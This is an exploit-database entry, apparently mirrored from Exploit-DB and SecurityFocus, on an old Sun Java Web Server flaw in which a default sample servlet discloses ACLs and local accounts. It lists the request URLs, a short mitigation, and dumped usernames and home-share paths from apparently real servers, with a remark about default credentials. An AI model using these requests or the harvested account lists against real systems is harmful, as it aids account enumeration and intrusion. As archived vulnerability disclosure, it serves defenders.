header-logo
Suggest Exploit
vendor:
Java Web Server
by:
SecurityFocus
7.5
CVSS
HIGH
Information Disclosure
200
CWE
Product Name: Java Web Server
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: a:sun_microsystems:java_web_server
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2002

Sun Java Web Server RealmDumpServlet Vulnerability

The servlet sunexamples.RealmDumpServlet, which is packaged by Default with Sun's Java Web Server, can be used to discover ACLs and local users on the server. It can be accessed by using the URL http://javawebserver/servlet/sunexamples.RealmDumpServlet#Realm-NT and http://javawebserver:8080/servlet/sunexamples.RealmDumpServlet#Users-UNIX.

Mitigation:

Disable the servlet sunexamples.RealmDumpServlet or restrict access to it.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/1498/info

The servlet sunexamples.RealmDumpServlet, which is packaged by Default with Sun's Java Web Server, can be used to discover ACLs and local users on the server. 

http://javawebserver.com/pservlet.html

User: sherwin

User: floorsoft

User: shaw

User: sears

User: beaulieu

User: diyonline

User: chicken

User: homedepot

User: abbey

User: goodhome

User: design1

User: 121312

User: buildnet

User: lowes

User: admin

User: emmitt

User: tms

User: ifloor

User: jeeves

^-------------------- default user / pass for web server

User: gerald

User: dixie

User: homeportfolio

User: buildscape

User: chuck

http://javawebserver/servlet/sunexamples.RealmDumpServlet

http://javawebserver:8080/servlet/sunexamples.RealmDumpServlet#Realm-NT



Individual Users:


User: brianw, home = \\aussie\home\brianw

User: chabell, home = \\aussie\home\chabell

User: davisons, home = \\aussie\home\davisons

User: exchadmin, home =

User: IUSR_AUSSIE, home =

User: IWAM_AUSSIE, home =

User: jd, home = \\aussie\home\jd

User: kkl, home = \\aussie\home\kkl

User: lisamh, home = \\aussie\home\lisamh

User: mattix, home = \\aussie\home\mattix

User: maxadmin, home = \\aussie\home\maxadmin

User: maxdev, home = \\aussie\home\maxdev

User: maxguest, home =

User: mcgreer, home = \\aussie\home\mcgreer

User: mdavis, home = \\aussie\home\mdavis

User: nbrathod, home = \\aussie\home\nbrathod

User: prnees, home = \\aussie\home\prnees

User: renee, home = \\aussie\home\renee

User: smcelder, home = \\aussie\home\smcelder

User: SQLAgentCmdExec, home = H:


http://javawebserver/servlet/sunexamples.RealmDumpServlet#Users-UNIX

Individual Users:


User: root, home = /

User: daemon, home = /

User: bin, home = /usr/bin

User: sys, home = /

User: adm, home = /var/adm

User: lp, home = /usr/spool/lp

User: uucp, home = /usr/lib/uucp

User: nuucp, home = /var/spool/uucppublic

User: listen, home = /usr/net/nls

User: nobody, home = /

User: noaccess, home = /

User: nobody4, home = /

User: mc, home = /space/u/mc

Navigation

Suggest Exploit

Services By CQR